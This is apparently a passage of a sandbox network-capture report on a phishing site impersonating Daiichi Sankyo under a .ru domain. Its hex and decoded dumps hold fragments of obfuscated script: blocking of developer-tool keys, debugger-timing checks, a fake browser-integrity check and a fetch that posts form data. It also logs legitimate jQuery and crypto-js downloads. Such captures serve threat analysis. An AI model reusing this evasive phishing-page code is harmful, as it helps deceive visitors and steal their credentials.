                                        2025-01-07 08:16:20 UTC1369INData Raw: 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43 69 41 67 49 43 42 39 44 51 6f 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 67 31 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 33 4d 79
                                        Data Ascii: gICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3My
                                        2025-01-07 08:16:20 UTC1369INData Raw: 64 57 64 6e 5a 58 49 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 4e 76 62 6e 4e 30 49 46 52 75 53 48 5a 48 62 57 4a 46 54 57 6b 67 50 53 42 77 5a 58 4a 6d 62 33 4a 74 59 57 35 6a 5a 53 35 75 62 33 63 6f 4b 54 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 67 4b 46 52 75 53 48 5a 48 62 57 4a 46 54 57 6b 67 4c 53 42 46 63 55 78 44 65 6e 6c 6b 54 45 70 4e 49 44 34 67 55 57 4a 32 54 31 56 71 5a 6b 35 74 54 53 41 6d 4a 69 41 68 61 33 68 53 55 33 5a 4f 65 47 52 56 62 53 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 55 56 68 5a 64 33 52 4b 62 57 46 6b 64 53 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 72 65 46 4a 54 64 6b 35 34 5a 46 56 74 49 44 30 67 64 48 4a 31 5a 54 73 4e 43 69 41 67 49 43 41
                                        Data Ascii: dWdnZXI7DQogICAgICAgIGNvbnN0IFRuSHZHbWJFTWkgPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgaWYgKFRuSHZHbWJFTWkgLSBFcUxDenlkTEpNID4gUWJ2T1VqZk5tTSAmJiAha3hSU3ZOeGRVbSkgew0KICAgICAgICAgICAgUVhZd3RKbWFkdSA9IHRydWU7DQogICAgICAgICAgICBreFJTdk54ZFVtID0gdHJ1ZTsNCiAgICA
                                        2025-01-07 08:16:20 UTC1369INData Raw: 6d 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 52 55 70 34 56 33 4e 74 64 6d 52 72 54 43 49 2b 44 51 70 44 62 32 35 6b 64 57 4e 30 61 57 35 6e 49 47 4e 6f 5a 57 4e 72 63 79 42 30 62 79 42 6a 62 32 35 6d 61 58 4a 74 49 48 6c 76 64 58 49 67 59 6e 4a 76 64 33 4e 6c 63 69 64 7a 49 47 6c 75 64 47 56 6e 63 6d 6c 30 65 53 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32
                                        Data Ascii: mJsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iRUp4V3NtdmRrTCI+DQpDb25kdWN0aW5nIGNoZWNrcyB0byBjb25maXJtIHlvdXIgYnJvd3NlcidzIGludGVncml0eS4NCjwvZGl2Pg0KPC9mb3JtPg0KPC9kaXY+DQo8L2Rpdj4NCjwvZGl2
                                        2025-01-07 08:16:20 UTC1369INData Raw: 51 69 4c 41 30 4b 49 43 41 67 49 43 41 67 49 43 42 69 62 32 52 35 4f 69 42 75 5a 58 63 67 52 6d 39 79 62 55 52 68 64 47 45 6f 63 33 52 53 57 6c 70 6e 5a 6d 5a 61 65 43 6b 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 48 4a 6c 63 33 42 76 62 6e 4e 6c 4c 6d 70 7a 62 32 34 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 4b 53 35 30 61 47 56 75 4b 47 52 68 64 47 45 67 50 54 34 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 6b 59 58 52 68 57 79 64 7a 64 47 46 30 64 58 4d 6e 58 53 41 39 50 53 41 6e 63 33 56 6a 59 32 56 7a 63 79 63 70 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 70 5a 69 68 52 57 46 6c 33 64 45 70 74 59 57 52 31 49
                                        Data Ascii: QiLA0KICAgICAgICBib2R5OiBuZXcgRm9ybURhdGEoc3RSWlpnZmZaeCkNCiAgICB9KS50aGVuKHJlc3BvbnNlID0+IHsNCiAgICAgICAgcmV0dXJuIHJlc3BvbnNlLmpzb24oKTsNCiAgICB9KS50aGVuKGRhdGEgPT4gew0KICAgICAgICBpZihkYXRhWydzdGF0dXMnXSA9PSAnc3VjY2Vzcycpew0KICAgICAgICBpZihRWFl3dEptYWR1I
                                        2025-01-07 08:16:20 UTC1369INData Raw: 69 73 20 6e 6f 74 20 74 68 65 20 6b 65 79 20 74 6f 20 68 61 70 70 69 6e 65 73 73 2e 20 48 61 70 70 69 6e 65 73 73 20 69 73 20 74 68 65 20 6b 65 79 20 74 6f 20 73 75 63 63 65 73 73 2e 20 2a 2f 0d 0a 69 66 28 4b 49 72 53 59 69 56 71 63 55 20 3d 3d 20 78 4f 51 68 45 45 69 50 55 4b 29 7b 0d 0a 63 6f 6e 73 74 20 73 66 4c 76 62 50 61 4e 72 70 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4f 68 6a 75 53 63 4c 71 5a 72 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4f 68 6a 75 53 63 4c 71 5a 72 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4f 68 6a 75 53 63 4c 71 5a 72 2e 70 61 74 68 6e
                                        Data Ascii: is not the key to happiness. Happiness is the key to success. */if(KIrSYiVqcU == xOQhEEiPUK){const sfLvbPaNrp = window.location.pathname.split('%23')[0].split('%3F')[0];if (OhjuScLqZr.pathname.endsWith('/')) {OhjuScLqZr.pathname = OhjuScLqZr.pathn
                                        2025-01-07 08:16:20 UTC1369INData Raw: 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6d 4e 68 62 47 4d 6f 4d 53 34 7a 4b 54 74 39 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 30 74 33 54 56 4e 43 5a 6b 5a 73 59 31 49 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 53 33 64 4e 55 30 4a 6d 52 6d 78 6a 55 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 30 74 33 54 56 4e 43 5a 6b 5a 73 59 31 49 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76
                                        Data Ascii: DR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI0t3TVNCZkZsY1IgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojS3dNU0JmRmxjUiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI0t3TVNCZkZsY1IuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3Rv
                                        2025-01-07 08:16:20 UTC1369INData Raw: 6f 67 49 43 41 67 49 43 41 67 49 48 64 70 62 6d 52 76 64 79 35 73 62 32 4e 68 64 47 6c 76 62 69 41 39 49 43 4a 68 59 6d 39 31 64 44 70 69 62 47 46 75 61 79 49 37 44 51 70 39 44 51 70 6b 62 32 4e 31 62 57 56 75 64 43 35 68 5a 47 52 46 64 6d 56 75 64 45 78 70 63 33 52 6c 62 6d 56 79 4b 43 64 72 5a 58 6c 6b 62 33 64 75 4a 79 77 67 5a 6e 56 75 59 33 52 70 62 32 34 6f 5a 58 5a 6c 62 6e 51 70 49 48 73 4e 43 69 41 67 49 43 42 70 5a 69 41 6f 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4d 54 49 7a 4b 53 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 56 32 5a 57 35 30 4c 6e 42 79 5a 58 5a 6c 62 6e 52 45 5a 57 5a 68 64 57 78 30 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 6d 59 57 78 7a 5a 54 73 4e 43
                                        Data Ascii: ogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNC


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.449745151.101.194.1374433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:21 UTC633OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                        Host: code.jquery.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://daiichi-sankyo.uronfecit.ru/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-07 08:16:21 UTC611INHTTP/1.1 200 OK
                                        Connection: close
                                        Content-Length: 89501
                                        Server: nginx
                                        Content-Type: application/javascript; charset=utf-8
                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                        ETag: "28feccc0-15d9d"
                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                        Access-Control-Allow-Origin: *
                                        Cross-Origin-Resource-Policy: cross-origin
                                        Via: 1.1 varnish, 1.1 varnish
                                        Accept-Ranges: bytes
                                        Age: 1722308
                                        Date: Tue, 07 Jan 2025 08:16:21 GMT
                                        X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890039-NYC
                                        X-Cache: HIT, HIT
                                        X-Cache-Hits: 55, 0
                                        X-Timer: S1736237782.552986,VS0,VE1
                                        Vary: Accept-Encoding
                                        2025-01-07 08:16:21 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                        2025-01-07 08:16:21 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                        2025-01-07 08:16:21 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                        2025-01-07 08:16:21 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                        2025-01-07 08:16:21 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                        2025-01-07 08:16:21 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                        2025-01-07 08:16:21 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                        2025-01-07 08:16:21 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                        2025-01-07 08:16:21 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                        2025-01-07 08:16:21 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.449747104.17.24.144433696C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-07 08:16:21 UTC661OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                        Host: cdnjs.cloudflare.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: cross-site
                                        Sec-Fetch-Mode: no-cors
